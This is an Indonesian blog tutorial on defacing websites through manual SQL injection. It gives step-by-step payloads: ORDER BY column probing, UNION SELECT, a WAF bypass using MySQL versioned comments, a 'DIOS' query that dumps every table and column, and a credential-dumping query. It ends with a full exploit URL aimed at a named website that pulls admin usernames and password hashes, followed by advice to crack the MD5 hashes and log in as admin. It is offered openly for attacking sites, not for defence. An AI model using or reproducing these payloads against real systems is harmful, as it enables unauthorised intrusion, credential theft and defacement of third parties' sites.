Iklan PopUp

Cara Deface SQL Injection Manual with DIOS + Bypass 406 (Not Acceptable)


Assalamualaikum wr.wb
Jumpa lagi dengan saya, maaf sebelumnya blog ini baru aktif lagi,
dan kali ini saya akan memberikan tutorial SQL Injection With DIOS.

Kebetulan target saya ini saat di injeksi sql terdapat Error Code 406(Not Acceptable)
Langsung saja simak tutorialnya.
Pertama masukan qoute code ( ' ) di belakang URL

Jika terdapat error itu berrarti VULN SQLi, atau bisa juga ada beberapa isi konten yang hilang, bisa di lihat seperti berikut ini.



Nah jika sudah mendapatkan target seperti ini, sekarang tinggal injeksi dengan kode berikut
+ORDER+BY+1--+
Jika error yang tadi hilang berarti bisa lanjut ke tahap berikutnya, lakukan perintah ORDER+BY+ sampai menemukan errornya lagi. Disini saya menemukan error di angka 7. 

Setelah menemukan angka yang error, selanjutnya ganti kode +ORDER+BY+7--+ tersebut dengan
+AND+0+UNION+SELECT+1--+

Perlu di perhatikan, memasukan angka di +AND+0+UNION+SELECT sebelum angka 7. Atau bisa di bilang masukan angka-angka yang tidak error tadi.
Contoh: 
+AND+0+UNION+SELECT+1,2,3,4,5,6--+
Dan ternyata saya menemukan error 406 Not Acceptable, jangan nyerah gan masih bisa di bypass WAFF kok:) 

Ganti AND+0+UNION+SELECT nya dengan query berikut
+AND+0+/**//*!12345UNION SELECT*//**/1,2,3,4,5,6--+
Dan Taraaa sekarang kita menemukan angka togel nya. Selanjutnya tinggal  masukin DIOS untuk menampilkan databasenya, caranya gimana? pilih salah satu angka togel tersebut lalu masukin DIOS nya.
berikut DIOS nya
 /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
Atau bisa lihat di gambar berikut

Setelah databasenya tampil sekarang cari table yang berhubungan dengan Admin Login. seperti gambar di bawah ini yaitu nama tablenya usertable dan columns nya username dan password.
Jika sudah, masukan query berikut untuk melihat isi columns dan jangan lupa untuk mengubah namatable dan namacolumns sesuai database. 
 (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolumns,0x203a3a20,namacolumns))))x)
Contoh Query:
http://www.interaliaproject.com/news.php?id=115%27+AND+0+/**//*!12345UNION%20SELECT*//**/1,2(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(usertable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6--+
Nah akan muncul username password adminnya. Biasanya password nya berbentuk encrypt MD5 kalian tinggal hash MD5 di  Web Hash Killer atau semacamnya. Jika sudah di hash, Sekarang tinggal cari admin loginnya

Untuk mencari admin login kalian bisa liat Tutorial Cara Mencari Admin Login Manual .

Mungkin cukup sekian yang bisa saya berikan ilmunya

Wassalamualaikum wr.wb

0 Response to "Cara Deface SQL Injection Manual with DIOS + Bypass 406 (Not Acceptable)"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel